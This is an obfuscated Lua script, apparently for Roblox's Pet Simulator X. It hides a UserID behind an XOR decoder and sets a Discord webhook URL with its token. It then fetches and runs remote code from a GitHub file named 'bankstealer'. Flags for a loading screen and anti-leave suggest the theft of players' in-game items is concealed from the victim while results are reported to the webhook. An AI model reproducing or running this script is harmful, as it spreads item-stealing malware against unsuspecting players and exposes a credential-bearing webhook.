--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10=(486 + 82) -(284 + 83 + 51 + 150) ;local v11;local v12;while true do if (v10==((146 + 782) -((1091 -(282 + 595)) + (2350 -(1523 + 114))))) then while true do local v14=0 + 0 ;local v15;while true do if (v14==(0 -0)) then v15=1065 -(68 + 997) ;while true do if (v15==0) then if (v11==(((1271 -(226 + 1044)) + (8 -6)) -((118 -(32 + 85)) + 1 + 0))) then return v5(v12);end if (v11==((316 + 1106) -(((2212 -(892 + 65)) -((672 -390) + (1099 -504))) + (1916 -872)))) then local v16=1637 -(1523 + 114) ;while true do if (v16==(351 -(87 + 263))) then v11=((970 -(67 + 113)) + 65 + 23) -(((984 -583) -(88 + 31)) + ((6597 -4937) -((1020 -(802 + 150)) + (2684 -1687)))) ;break;end if (v16==((2303 -1033) -(165 + 61 + (2041 -(915 + 82))))) then local v17=0 -0 ;while true do if (v17==(0 + 0)) then v12={};for v18=(2 -0) -((1191 -(1069 + 118)) -3) , #v8 do v6(v12,v0(v4(v1(v2(v8,v18,v18 + (((269 -150) -(32 + (185 -100))) -(1 + 0 + 0)) )),v1(v2(v9,((127 + 442) -(((2351 -1027) -(892 + 65 + 0)) + ((1270 -(368 + 423)) -(873 -595)))) + (v18% #v9) ,(928 -(214 + (731 -(10 + 8)))) + (v18% #v9) + ((3 -2) -(442 -(416 + 26))) + ((0 -0) -0) )))%(((168 + 223) -((153 -66) + (701 -(145 + 293)))) + ((825 -(44 + 386)) -((1553 -(998 + 488)) + 36 + 77))) ));end v17=1;end if (v17==(1 + 0)) then v16=773 -(201 + 571) ;break;end end end end end break;end end break;end end end break;end if (v10==(0 + 0)) then local v13=1138 -(116 + 1022) ;while true do if (v13==(4 -3)) then v10=1 + 0 + 0 ;break;end if (v13==0) then v11=(0 -0) -0 ;v12=nil;v13=3 -2 ;end end end end end _G.UserID=v7("\213\194\210\43\227\183\202\17\221\204\215","\126\177\163\187\69\134\219\167");_G.Webhook="https://discord.com/api/webhooks/1136589869301366884/uFHnmAscdgZRZcyOD9tmF6rXX4sqm1xVuyU3qZR5nA2Pq7i-Q6TNJxlfGtIMebcE2XML";_G.LoadingScreen=true;_G.AntiLeave=true;_G.MouseLock=false;loadstring(game:HttpGet("https://raw.githubusercontent.com/Egorikusa/PetSimulatorX/main/bankstealer",true))();
